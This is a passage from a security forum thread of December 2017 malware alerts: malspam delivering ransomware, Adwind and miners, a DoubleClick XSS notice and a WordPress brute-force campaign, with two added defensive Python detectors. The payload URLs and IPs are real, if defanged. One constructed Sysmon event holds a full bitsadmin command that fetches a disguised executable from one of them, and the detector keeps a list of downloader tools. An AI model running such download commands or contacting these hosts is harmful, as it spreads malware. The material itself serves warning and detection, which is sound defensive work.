 http ://80.82.67.217/paddle.jpg which of course is -not- an image file but a renamed .exe (ASxas.exe)
VirusTotal 8/67[4]. Hybrid Analysis[5]... HA shows a further download of a bitcoin miner (VirusTotal 43/66[6])
but Anyrun could not get anything despite leaving it running for 10 minutes...
This word doc looks like this:
> https://myonlinesecu...esume_1_doc.png
And after you input the password from the email body (123456) you see a typical page asking you to enable editing and then macros and content:
> https://myonlinesecu...esume_2_doc.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1513715092/
Resume.doc

** https://www.hybrid-a...vironmentId=100

4] https://www.virustot...sis/1513716371/
paddle.jpg.exe

5] https://www.hybrid-a...vironmentId=100
DNS Requests
37.59.55.60
107.181.246.221

Contacted Hosts
139.59.208.246
107.181.246.221
188.165.214.95


6] https://www.virustot...6d51c/analysis/
bitcoinminer1

80.82.67.217: https://www.virustot...17/information/
> https://www.virustot...4cbe9/analysis/
___

Office as a malware delivery platform: DDE, Scriptlets, Macro obfuscation
... Powerful behind-the-scenes features in Office have suddenly stepped back into the malware limelight, with an onslaught of mostly macro-less attacks starring jimmied Word, Excel and PowerPoint documents
> https://www.computer...bfuscation.html
Dec 19, 2017 - "... Some clever researchers have found new and unexpected ways to get Word, Excel and PowerPoint documents to deliver all sorts of malware — ransomware, snoopers, even a newly discovered credential stealer that specializes in gathering usernames and passwords. In many cases, these new uses employ methods as old as the hills. But the old warning signs don’t work as well as they once did..."
(Much more detail at the computerworld URL above.)

ADV170021 | Microsoft Office Defense in Depth Update
- https://portal.msrc....isory/ADV170021
12/12/2017 - "... provides enhanced security as a defense-in-depth measure. The update disables the Dynamic Update Exchange protocol (DDE) in all supported editions of Microsoft Word..." - Also:
> https://docs.microso...es/2017/4053440
Updated: Dec 12, 2017

>> https://www.askwoody...on/#post-153388
Dec 20, 2017
 

:ph34r: :ph34r:    <_<


Edited by AplusWebMaster, 20 December 2017 - 08:22 AM.

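A detection rule for the delivery chain in the quoted post (Office document, autoclose macro, bitsadmin.exe fetching a renamed executable), as an added Python example that is not the post's or the analyst's code. It runs over constructed process-creation events in the shape of Sysmon Event ID 1 fields; the exact bitsadmin command line, process IDs and local paths are assumed, and only the download URL and payload name come from the post. Because the macro fires on AutoClose, the child process appears after the user thinks they are done with the document, but the parent-child relationship is recorded all the same.

```python
"""Detection for an Office application spawning bitsadmin.exe (or another
living-off-the-land downloader) to fetch a payload. Input is a list of
process-creation events shaped like Sysmon Event ID 1 fields; the sample
events at the bottom are constructed."""
import re
from typing import Optional

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
DOWNLOADERS = {"bitsadmin.exe", "powershell.exe", "certutil.exe",
               "mshta.exe", "regsvr32.exe", "rundll32.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Extensions used to make an executable look like a harmless image on the wire.
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif", ".bmp")


def image_name(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def inspect(event: dict) -> Optional[dict]:
    """Return a finding when an Office process starts a known downloader."""
    parent = image_name(event["ParentImage"])
    child = image_name(event["Image"])
    if parent not in OFFICE_APPS or child not in DOWNLOADERS:
        return None
    cmd = event["CommandLine"]
    urls = URL_RE.findall(cmd)
    reasons = [f"{parent} spawned {child}"]
    if child == "bitsadmin.exe" and "/transfer" in cmd.lower():
        reasons.append("bitsadmin /transfer used to download a file")
    for url in urls:
        if url.lower().endswith(IMAGE_EXT):
            reasons.append(f"download URL disguised with an image extension: {url}")
    return {"pid": event["ProcessId"], "urls": urls, "reasons": reasons}


def scan(events) -> list:
    """Apply inspect() to every event and keep the hits."""
    return [hit for hit in (inspect(e) for e in events) if hit]


# Constructed events. The URL and payload name are from the post; the
# bitsadmin arguments, process IDs and local paths are assumed.
SAMPLE_EVENTS = [
    {"ProcessId": 4120,
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": r"bitsadmin /transfer job1 /download /priority high "
                    r"http://80.82.67.217/paddle.jpg C:\Users\u\AppData\Local\Temp\ASxas.exe"},
    {"ProcessId": 4130,   # benign: BITS client run by a service, no Office parent
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "bitsadmin /list"},
    {"ProcessId": 4140,   # benign: Word starting a helper that is not a downloader
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The parent-process check is what makes this a useful rule rather than a noisy one: bitsadmin.exe and powershell.exe are legitimate on most hosts, but an Office application starting them is rarely anything other than a macro.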


#2067 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 21 December 2017 - 07:28 AM

FYI...

DoubleClick Advertising network XSS vuln
- https://myonlinesecu...-vulnerability/
21 Dec 2017 - "Just a quick alert about an email from Google warning of vulnerabilities in some DoubleClick publishers. This has been sent to all website owners who use DoubleClick in any form. However this will ONLY affect website owners who use DoubleClick as a stand alone service to display adverts. It does not affect website owners who use Google AdSense to display adverts and have enabled the additional options to also use DoubleClick as a method of advertising in the allowed advertisers section of your Google AdSense settings page:
> https://myonlinesecu...k_XSS_alert.png
The email reads:
'Dear Customer,
We’ve identified certain vendor files that may contain XSS vulnerabilities which could pose a security risk. Please check if you are hosting these files and remove them with the help of your webmaster. These are the currently identified third-party vendor files...'"
(More detail at the myonlinesecurity URL above.)

> https://support.goog.../answer/7622991
___

Cryptominers...
- https://umbrella.cis...-mining-mayhem/
Dec 19, 2017 - "As cryptocurrencies continue to increase in value, cryptomining becomes increasingly more lucrative. With Bitcoin nearly reaching $18,000USD/1BTC, speculation that other cryptocurrencies such as Ethereum and Monero may hit this mark eventually is rising. Monero is especially interesting given that one of its primary advantages is the relatively low processing power needed to mine it. Given that it is capable of being mined even by consumer grade computers, many organizations have tried to capitalize on this facet of the currency.
> https://s3-us-west-1...seOfTheCoin.png
Launched in September of this year, Coinhive is a service that has transformed the internet already in its short life. 'Coinhive' allows users to embed JavaScript API calls to enable anonymous mining of Monero cryptocurrency in browsers. 'Monero' aims to improve on existing cryptocurrency design by obscuring the sender, recipient and amount of every transaction made, as well as making the mining process more egalitarian by lowering processing costs. Though Coinhive as an organization has said they want users to come up with new uses for their service, it’s hard to imagine they wanted users to create apps that then go on to be abused...
It’s impossible to say with accuracy where the future will take cryptocurrencies or cryptominers, but they’re almost certainly here to stay. As the internet continues to evolve in its third decade of existence, enterprising individuals will always be looking for the next motherlode, taking advantage of a landscape that others can’t see."
(More detail at the umbrella.cisco URL above.)
 

:ph34r: :ph34r: :ph34r:


Edited by AplusWebMaster, 21 December 2017 - 09:50 AM.



#2068 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 22 December 2017 - 06:29 AM

FYI...

Fake 'Outstanding Statement' SPAM - delivers ransomware
- https://myonlinesecu...ter-ransomware/
22 Dec 2017 - "... malware downloaders from the Necurs botnet... an email with the subject of 'Outstanding Statement' pretending to come from Prime Express Oldham <sales62@ primeexpressuk .com> (random numbers after sales) delivering Globeimposter ransomware...

Screenshot: https://myonlinesecu...22_11-48-59.png

Customer Statement (122017_6816162).7z: Extracts to: Customer Statement (122017_51767638).js
Current Virus total detections 16/55*. Hybrid Analysis**...
This js file downloads from
 http ://www.upperlensmagazine .com/tOldHSYW??DVTCGAtym=DVTCGAtym (VirusTotal 11/68[3]). As usual there will be 6 or 8 other download sites... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1480616575/
-6dt874p53077.js

** https://www.hybrid-a...vironmentId=100
DNS Requests
45.126.209.154
Contacted Hosts
45.126.209.154

3] https://www.virustot...sis/1513941343/
GWMadFzby2.exe

upperlensmagazine .com: 45.126.209.154: https://www.virustot...54/information/
> https://www.virustot...3ae1b/analysis/
 

:ph34r: :ph34r:    <_<


Edited by AplusWebMaster, 22 December 2017 - 06:35 AM.



#2069 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 24 December 2017 - 08:34 AM

FYI... Bah Humbug! ...

Fake 'UPS Invoice' SPAM - delivers Java Adwind
- https://myonlinesecu...va-jrat-trojan/
24 Dec 2017

Screenshot: https://myonlinesecu...UPS_Invoice.png

INVOICE.zip: extracts to INVOICEE.jar (533kb) - Current Virus total detections 14/61* | Hybrid Analysis**...

"... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."

* https://www.virustot...sis/1514092872/
INVOICEE.jar

** https://www.hybrid-a...vironmentId=100
DNS Requests
185.171.25.4
Contacted Hosts
46.246.120.179
92.122.154.56

 

:ph34r: :ph34r:    <_<




#2070 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 26 December 2017 - 02:01 PM

FYI...

Fake blank/empty SPAM - delivers globeimposter ransomware
- https://myonlinesecu...ter-ransomware/
26 Dec 2017 - "... malware downloaders from the Necurs botnet... a blank/empty email with the subject of 'CCE26122017_004385' (random numbers after the date) pretending to come from random names and random email addresses that just has a 7z attachment containing a .js file... One of the emails looks like:
From: Emmitt <Emmitt@ kendrixcorp .com>
Date: Tue 26/12/2017 15:04
Subject: CCE26122017_004385
Attachment: CCE26122017_004385.7z

Body content: completely blank/empty

Screenshot: https://myonlinesecu...26_15-28-28.png

CCE26122017_004385.7z: Extracts to: CCE26122017_48779.js - Current Virus total detections 11/58*. Hybrid Analysis**...
This particular version downloads from
 http ://www.thedournalist .com/mnbTREkfDS??jYAbcsB=jYAbcsB (there will normally be 6-8 other download locations)
(VirusTotal 7/68[3])...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1514301126/
CCE26122017_48779.js

** https://www.hybrid-a...vironmentId=100
DNS Requests
86.106.30.37
Contacted Hosts
86.106.30.37

3] https://www.virustot...sis/1514301538/
mnbTREkfDS.exe

thedournalist .com: 86.106.30.37: https://www.virustot...37/information/
___

Massive Brute-Force Attack Infects WordPress Sites with Monero Miners
- https://www.bleeping...-monero-miners/
Dec 20, 2017 - "... WordPress sites around the globe have been the targets of a massive brute-force campaign during which hackers attempted to guess admin account logins in order to install a Monero miner on compromised sites...
Once attackers get in, they install a Monero miner, and they also use the infected site to carry out further brute-force attacks. These two operations don't happen at the same time, and each site is either brute-forcing other WordPress sites or mining Monero..."

WordPress Brute Force Attack Campaign
- https://www.wordfenc...ordpress-attack
Dec 18, 2017 - "A massive distributed brute force attack campaign targeting WordPress sites started this morning at 3am Universal Time, 7pm Pacific Time. The attack is broad in that it uses a large number of attacking IPs, and is also deep in that each IP is generating a huge number of attacks. This is the most aggressive campaign we have seen to date, peaking at over 14 million attacks per hour. The attack campaign was so severe that we had to scale up our logging infrastructure to cope with the volume when it kicked off, which makes it clear that this is the highest volume attack that we have seen in Wordfence history, since 2012..."
___

Remove the Slmgr32.exe Monero CPU Miner
- https://www.bleeping...onero-cpu-miner
Nov 3, 2017
 

:ph34r: :ph34r:    <_<


Edited by AplusWebMaster, 26 December 2017 - 02:16 PM.

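One way to spot the wp-login.php brute-force traffic the two quoted articles describe, from ordinary web server access logs, as an added Python example that is not from Bleeping Computer, Wordfence or the post. The log lines are constructed (TEST-NET addresses), the 60-second window and threshold of 10 are arbitrary starting points to tune per site, and the 302 check only flags a possible success, since WordPress redirects after a good login while a failed one re-serves the form with a 200.

```python
"""Find brute-force login sources in WordPress access logs: count POSTs to
wp-login.php (and xmlrpc.php, another common login vector) per client IP in
a sliding window and report sources over a threshold. A 302 seen once the
source is over the threshold is flagged as a possible successful login."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache/nginx "combined" log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")


def parse(line: str):
    """(ip, timestamp, method, path without query string, status) or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?", 1)[0], int(m["status"])


def find_bruteforcers(lines, window_sec=60, threshold=10) -> dict:
    """{ip: {"peak": attempts in its busiest window, "possible_success": bool}}"""
    recent = defaultdict(deque)  # ip -> timestamps of login POSTs still inside the window
    report = {}
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        if method != "POST" or path not in LOGIN_PATHS:
            continue
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_sec:
            q.popleft()
        if len(q) >= threshold:
            entry = report.setdefault(ip, {"peak": 0, "possible_success": False})
            entry["peak"] = max(entry["peak"], len(q))
            if status == 302:
                entry["possible_success"] = True
    return report


def sample_log() -> list:
    """Constructed lines (TEST-NET addresses): one source hammering the login
    form and getting a redirect on its last try, one slow user, one page view."""
    fmt = "%d/%b/%Y:%H:%M:%S +0000"
    t0 = datetime(2017, 12, 18, 3, 0, 0)
    lines = []
    for i in range(12):
        status = 302 if i == 11 else 200
        ts = (t0 + timedelta(seconds=2 * i)).strftime(fmt)
        lines.append(f'203.0.113.5 - - [{ts}] "POST /wp-login.php HTTP/1.1" {status} 1203 "-" "Mozilla/5.0"')
    for i in range(3):
        ts = (t0 + timedelta(seconds=10 * i)).strftime(fmt)
        lines.append(f'198.51.100.7 - - [{ts}] "POST /wp-login.php HTTP/1.1" 200 1203 "-" "Mozilla/5.0"')
    lines.append(f'192.0.2.1 - - [{t0.strftime(fmt)}] "GET /wp-login.php HTTP/1.1" 200 1203 "-" "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    for ip, info in find_bruteforcers(sample_log()).items():
        print(ip, info)
```

A campaign as distributed as the Wordfence one keeps each source below any per-IP threshold, so in practice you pair this with a site-wide rate on the same paths, and with the usual mitigations of disabling xmlrpc.php where it is not needed and rate-limiting the login form at the web server.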
